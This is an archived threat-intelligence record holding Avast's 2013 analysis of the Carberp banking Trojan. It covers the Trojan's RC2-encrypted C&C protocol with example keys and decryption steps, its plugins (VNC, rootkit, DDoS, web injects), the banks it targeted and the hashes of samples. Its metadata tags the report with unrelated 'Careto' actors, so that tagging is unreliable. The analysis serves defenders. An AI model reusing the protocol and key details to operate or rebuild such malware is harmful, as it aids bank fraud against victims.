{
	"id": "cf7d4446-d9f4-47a4-ad74-87a1231abba4",
	"created_at": "2026-04-06T00:11:13.603988Z",
	"updated_at": "2026-04-10T13:12:37.871122Z",
	"deleted_at": null,
	"sha1_hash": "66fa38a25ed9a481bc6b653117e922e3b50c7974",
	"title": "Banking Trojan Carberp: An Epitaph?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 724867,
	"plain_text": "Banking Trojan Carberp: An Epitaph?\r\nBy Threat Intelligence Team 8 Apr 2013\r\nArchived: 2026-04-05 18:47:13 UTC\r\nThe beginning of spring seems to be an unsuccessful period of the year for cybercriminals in Eastern Europe. There\r\nis recent news referring to a neutralization of a group of hackers by joint cooperation between the Security Service\r\nof Ukraine with the Federal Security Service of the Russian Federation (FSB) on the web. These hackers are\r\nresponsible for the infamous Trojan called Carberp.\r\nDue to this recent information, we are allowed to say that Carberp was a mainstream Trojan that monitored the\r\nenvironment of infected computers and exploited remote banking systems. It was a robust modular malware that\r\nimproved its capabilities by drive-by-downloaded dynamic libraries – plugins. It was not only successfully\r\ngrabbing money from victims' bank accounts but also the attention of security experts both in the industrial and the\r\nacademic sphere (an example of a paper). Therefore there are plenty of references on the web considering the\r\nmethods of system invasion, protection by polymorphic outer layers and the persistence of the Trojan. We will try\r\nto fill in some gaps in the picture.\r\nCarberp started its progress approximately in autumn 2010. Later in spring 2011 it was split into two main\r\nbranches regarding the form of HTTP requests. The first one used the RC4 cipher to encrypt data exchanged with\r\nC\u0026C and it posted requests in the form:\r\nhttp://\u003ctop level domain\u003e/e/\u003c8-11 random alphanumeric characters\u003e\r\nThis one faded away along with the arrest of cybercriminals in March 2012. The second one was based on the RC2\r\ncipher and it generated hits with avast! shields in the wild during the last weeks. 
Let's see how it talked with C\u0026C.\r\nCommunication protocol\r\nA typical HTTP post looked like\r\nPOST /kmqkcicalxrntrngwdxjyxztxcqkoyjnbdoafqirgnwwvpcjqglucovna.phtm HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322;\r\n.NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\nHost: caaarrp2.ru\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 60\r\nwith a content of the form like this:\r\nkfq=u%2FFPG1eImmXBEb3mG5VomEqE9ivVw2uh550qE1K2LoqWfJkbTeN%3D\r\nhttps://blog.avast.com/2013/04/08/carberp_epitaph/\r\nPage 1 of 10\n\nwhere ‘kfq’ is a randomly generated string which is concatenated with the equality sign and an encoded message.\r\nUnsafe characters in the encoded message are escaped with the percent sign. Let's write this particular example\r\nafter decoding:\r\nkfq=u/FPG1eImmXBEb3mG5VomEqE9ivVw2uh550qE1K2LoqWfJkbTeN=\r\nand let's extract the first 4 symbols after the first equality symbol concatenated with the last 4 symbols (ignoring\r\nthe trailing equality symbol) as a string. It is used as a cryptographic salt for RC2 decryption; denote it szSalt,\r\ni.e. szSalt = ‘u/FPbTeN’. Then the proper encrypted message equals (denote it szEncMsg):\r\nG1eImmXBEb3mG5VomEqE9ivVw2uh550qE1K2LoqWfJ\r\nAfter the decryption on the server side it would read like ‘botuid=wtfuck0780E8ABE9244C0B4’ where\r\n‘wtfuck’ is a constant encrypted in the Trojan’s body and ‘780E8ABE9244C0B4’ is a particular hash of the victim’s\r\nenvironment. Every sample of Carberp contained another constant - a key, denote it szKey, e.g. szKey =\r\n‘mt19YrKTaSH3kCVA’.\r\nDecryption of the content is performed in the following steps:\r\nStep 1) Extraction of the proper encrypted message and the variable szSalt. 
Transformation of ‘+’ to ‘\u003e’ and ‘/’ to\r\n‘?’.\r\nStep 2) Decoding of szEncMsg to a buffer au8EncMsg_Debase64\r\nStep 3) Decrypting the buffer au8EncMsg_Debase64 to a buffer au8EncMsg_Debase64_DeRC2 using RC2\r\nwith the salt szSalt and the key szKey\r\nIf the downloaded content is an encrypted executable or a configuration file then there is another step:\r\nStep 4) Decrypting the buffer au8EncMsg_Debase64_DeRC2 using a custom algorithm decryptBJB(..) that had\r\nalready appeared in early stages of Carberp. A magic string \"BJB\" is in the header and it is followed by a key\r\nlength, a key string and the main ciphered data.\r\ncarberp_decBJB\r\nOne of the early requests going to C\u0026C is a request for the list of available plugins. After a successful connection a list of\r\nplugins is saved in \"%AppData\\\u003chash sequence\u003e\\wndsksi.inf\" in an encrypted form. Ignoring the first 20 bytes\r\nand using the mentioned decryptBJB algorithm with the key \"GDlet64E\" one could get something similar to:\r\nammy.plug|Y05jP1GNybVxZ3Wv6sMQCwzmJ9rhH2Rg.tiff\r\nconfig.bin|KVZswznW95xFch3X.tiff\r\nddos.plug|ZqRMXA6Cxsg1m3KbdfyF2ncYPWV78TpN.bmp\r\nifobs.plug|8X2ZWnDfSsrpYtK1hdazxcq.bmp\r\npassw.plug|53DS2x0qgvmGzwtpyrahPQW9J8nNA.tiff\r\nrdp.plug|aDb6TYnKkc3Q7N.tiff\r\nrtlext.plug|jhJrdMWzK2XqpkYV91a6tQv7Z.psd\r\nsb.plug|8DhsH4PmpSFWrV7QwA5dtbv0KJN.tiff\r\nvnc.plug|JD6HPMCQjN8kgFYcR57pdtn1y2X0rm.psd\r\nThis list shows only a subset of plugins available for the bot. The following diagram estimates the evolution of\r\navailable plugins and the time when they appeared for the first time:\r\nCarberp Evolution of Plugins\r\nDetailed analysis of plugins\r\nPlugins from early stages of development are well known (miniav.plug, stopav.plug, passw.plug) and the yellow\r\nones seemed to be obsolete in recent versions of the bot. 
File ddos.plug exports a single function called\r\n‘StartHTTP’ and contains a list of various HTTP referrers and domain names. The name of the plugin indicates its\r\npotential in a distributed denial-of-service attack.\r\nThe orange group contains cyberplat.plug, sb.plug (evolved from the early sbtest.plug version) and ifobs.plug that try\r\nto exploit the Cyberplat, iFOBS and Sberbank payment processing systems. Last month a download of a Java archive\r\ncalled AgentX.jar together with an encrypted data file rt.ini (two steps of decryption, one of which is RC4 with the\r\nkey \"123%esr2#221@#\") was implemented in the Carberp module. They are dropped into the application\r\ndirectory of an e-banking system called IBank. The plain ini file could look like (observe the C\u0026C servers of the\r\nbot):\r\nThe archive is a successor of previously used archives patching Java code on the fly called Agent.jar,\r\nAgentPassive.jar and AgentKP.jar. They all had the potential to fraudulently interact with a victim's payment\r\nprocessing. A text document uid.txt containing the id of the running instance of the bot was created and declared a\r\nsign of infection.\r\nThe light blue group represents utilities enhancing the remote spying activities of the Trojan. 
File vnc.plug is an\r\nexecutable that enables remote access to an infected computer via the remote framebuffer protocol (RFB).\r\nAdditionally, it contains an embedded library inj_x86.dll (inj_x64.dll respectively) which provides user mode\r\nrootkit functionality that masks processes started remotely (on \"secret_desktop\") on the victim's desktop:\r\nThe green group is all about the plugin bot.plug which has most of the functionality of the main Carberp module\r\nin the form of a dynamically linked library exporting three functions: SetBotParameter, Start and SFFD (the latter\r\ninjects its own code into explorer as the main module does). It is produced by a generator called Bot builder:\r\nAfter a request for its download it is stored in an encrypted form in the %AppData% directory for later use. It could be\r\nremotely reactivated by a command installfakedll from a C\u0026C server which leads to a drop of fake.dll into the\r\nInternet Explorer program directory under various confusing names (e.g. sqmapi.dll, browsui.dll). A function of\r\nthis library is the decryption of the stored bot.plug followed by calls to the bot's exports Start and SFFD.\r\nOne of the files additionally requested is called config.bin. It is a set of JavaScript web injects attacking\r\nvarious internet banking systems in Russia and Ukraine. 
Injects are triggered by particular masks in a\r\nweb browser (the targeted bank is given in brackets):\r\n'banking.pivdenny.com' (Pivdennyi)\r\n'ibank.svyaznoybank.ru' (Svyaznoybank)\r\n'online.rsb.ru' (Russian Standard Bank)\r\n'bsi.dll?T=RT_1Loader.Load' (OJSC Nordea Bank)\r\n'ifobsClient/ifobstoday' (iFOBS Online Banking System, OTP Bank Ukraine)\r\nlibertyreserve (LibertyReserve)\r\nprivatbank (PrivateBank Ukraine)\r\nTo demonstrate the concept of injects on the mask \"google.com\" just observe the process of its creation in the\r\nfollowing steps: choosing the data before and the data after a desired replacement of HTML code and filling the space\r\nwith the injected code, then displaying how the source code appears in the configuration file and finally how it changes the\r\ncontent of a web page:\r\nCarberp on Android\r\nAt the end of 2012, three malicious Android applications were mentioned in connection with Carberp (nicknamed\r\nCarberp-in-the-Mobile by security researchers) that tried to extend its fraudulent activities to mobile devices (a\r\ntriple represents the application name, its MD5 hash and the detection by the avast! engine):\r\nSberSafe f27d43dfeedffac2ec7e4a069b3c9516 Android:Spitmo-E [Trj]\r\nAlfaSafe 07d2ee88083f41482a859cd222ec7b76 Android:SpyCitmo-D [Trj]\r\nVkSafe 117d41e18cb3813e48db8289a40e5350 Android:SpyCitmo-C [Trj]\r\nThese apps posted HTTP requests in the form:\r\nhttp://ber\u003cREMOVED\u003e.com/m/fo125kepro;http://ber\u003cREMOVED\u003e.com/m/as225kerto ;\r\nwith the domain that was also used as C\u0026C by the branch of Carberp using RC4 encryption. The conclusion is\r\nthat these apps are probably not connected with the bot we have analyzed.\r\nSources\r\nFinally, MD5 hashes of some selected samples with the detections of the avast! 
engine:\r\nCarberp Bot (version 1.8) 422ec27f405ea8415a6dd606f53ec5ca Win32:Carberp-ANO [Trj]\r\nsb.plug 3150522d039ea64715951d2461c04b9f Win32:Carberp-AI [Trj]\r\nrdp.plug 5f93b2f8d8c0f6f00f3cc99adbe7efc0 Win32:SpyeyePlugin-E [Trj]\r\nddos.plug e20146551b34409d71dde02a8e3d5c15 Win32:CarberpPlugin-L [Trj]\r\nvnc.plug 5683fcb77c6f6447aba75b44338cb461 Win32:CarberpPlugin-K [Trj]\r\nifobs.plug c96ff5f3ec55220e99b9d7c8a3a98e8f Win32:CarberpPlugin-M [Trj]\r\nbot.plug f29e19cbe20dd7e0eba5d1ff09abdbbb Win32:CarberpPlugin-P [Trj]\r\nfake.dll 6b2fcfa7cb57a44d28530eaf28ac253e Win32:CarberpPlugin-N [Trj]\r\nammy.plug 3b91280aa14a1dc0870f53f76a48c3f8 Win32:AmmyyRAdmin-A [PUP]\r\niphlpapi.dll 0993ac70dd8ab896ae349f45cc82d63d Win32:CarberpPlugin-Q [Trj]\r\nActiveX.jar 46f348d9a990004d8e2c5694f5544f56 Java:Carberp-A [Trj]\r\npassw.plug 38956767859e03e126f1d79c0f0e3ea0 Win32:CarberpPlugin-D [Trj]\r\nAcknowledgment\r\nSincere gratitude goes to my colleague Jaromír Hořejší for cooperation on this analysis.\r\nSource: https://blog.avast.com/2013/04/08/carberp_epitaph/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.avast.com/2013/04/08/carberp_epitaph/"
	],
	"report_names": [
		"carberp_epitaph"
	],
	"threat_actors": [
		{
			"id": "67bf0462-41a3-4da5-b876-187e9ef7c375",
			"created_at": "2022-10-25T16:07:23.44832Z",
			"updated_at": "2026-04-10T02:00:04.607111Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"Careto",
				"The Mask",
				"Ugly Face"
			],
			"source_name": "ETDA:Careto",
			"tools": [
				"Careto"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f5bf6853-3f6e-452c-a7b7-8f81c9a27476",
			"created_at": "2023-01-06T13:46:38.677391Z",
			"updated_at": "2026-04-10T02:00:03.064818Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"The Mask",
				"Ugly Face"
			],
			"source_name": "MISPGALAXY:Careto",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434273,
	"ts_updated_at": 1775826757,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/66fa38a25ed9a481bc6b653117e922e3b50c7974.pdf",
		"text": "https://archive.orkl.eu/66fa38a25ed9a481bc6b653117e922e3b50c7974.txt",
		"img": "https://archive.orkl.eu/66fa38a25ed9a481bc6b653117e922e3b50c7974.jpg"
	}
}